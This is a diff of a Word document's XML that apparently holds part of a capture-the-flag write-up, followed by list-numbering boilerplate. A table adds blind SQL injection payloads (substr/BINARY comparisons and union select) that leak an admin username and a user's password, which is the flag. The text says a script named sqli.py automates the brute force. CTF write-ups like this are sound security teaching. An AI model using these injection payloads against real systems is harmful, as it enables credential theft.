+              <w:t>(username,1,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>prodigysml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' and roles=BINARY 'HR admin' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>L</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>eaks out the first admin username.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,username</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,password</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!}' and username=BINARY '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>prodigysml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>L</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>eaks out the password of “</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>prodigysml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>” which turns out to be the flag</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>: “</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434C28DB" wp14:editId="3DB84674">
+                  <wp:extent cx="2532380" cy="664845"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
+                  <wp:docPr id="2" name="Picture 2"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="2" name="Picture 2"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId13" cstate="print">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2532380" cy="664845"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>he above steps</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (plus more </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>exploration</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> steps)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> detailed and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> automated in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>sqli.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">By running it directly using </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sqli.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ill </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>brute-force out</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Uncommenting code for other steps and rerunning </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>the file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>produce</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> corresponding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> outputs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Proof_of_Concept" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>Return to the main report</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId8"/>
-      <w:footerReference w:type="first" r:id="rId9"/>
+      <w:footerReference w:type="default" r:id="rId14"/>
+      <w:footerReference w:type="first" r:id="rId15"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -4897,6 +10961,1008 @@
     </w:p>
   </w:footnote>
 </w:footnotes>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="00C77B6D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F490BB62"/>
+    <w:lvl w:ilvl="0" w:tplc="83F6DDAE">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="03527FC3"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FF4478B4"/>
+    <w:lvl w:ilvl="0" w:tplc="864CAE72">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0C2C3046"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="656C570E"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="20866947"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="08889B24"/>
+    <w:lvl w:ilvl="0" w:tplc="D6841A58">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
